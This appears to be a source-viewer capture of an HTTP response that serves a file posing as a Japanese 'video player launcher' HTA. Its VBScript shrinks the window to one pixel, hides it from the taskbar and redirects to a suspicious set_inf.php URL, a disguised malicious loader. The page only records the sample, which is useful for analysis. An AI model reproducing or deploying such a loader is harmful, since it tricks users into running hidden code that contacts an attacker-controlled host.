URL:    [ Dan Winchester Home ] [ View Source Home ] 
HTTP/1.1 302 Found
Date: Sat, 14 May 2011 15:16:53 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.13
Location: /
Content-disposition: attachment; filename=efhmovie.hta
Content-Length: 1048
Connection: close
Content-Type: application/hta
X-Pad: avoid browser bug

<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<title>動画プレイヤー起動</title>
<Script Language="VBScript">
on error resume next

'ウィンドウのサイズ設定
winwidth = 1
winheight = 1

'ムービーのサイズにあわせてリサイズ
window.resizeTo winwidth,winheight

'画面下中央に移動
positionX = ( screen.availWidth - winwidth )
positionY = ( screen.availHeight - winheight )
window.moveTo positionX, positionY

sub window_onLoad

Dim str
str = "	http://kwertsdfgxcvbk.info/set_inf.php?id=&sid=&f=1	"

Location.Href = Trim(str)
end sub


</Script>
</head>
<body>
<HTA:APPLICATION 
    APPLICATIONNAME=""
    ID=""
    VERSION="1.0"
    SINGLEINSTANCE="yes"
    SHOWINTASKBAR="no"
    NAVIGABLE="yes"
    WINDOWSTATE="normal"
    BORDER="none"
    INNERBORDER="no"
    BORDERSTYLE="normal"
    CONTEXTMENU="no"
    SELECTION="no"
    SCROLL="no"
    SCROLLFLAT="no"
    CAPTION="no"
    ICON=""
    SYSMENU="no"
    MAXIMIZEBUTTON="no"
    MINIMIZEBUTTON="no"
/>
</body>
</html>
 Questions or comments welcome: contact me.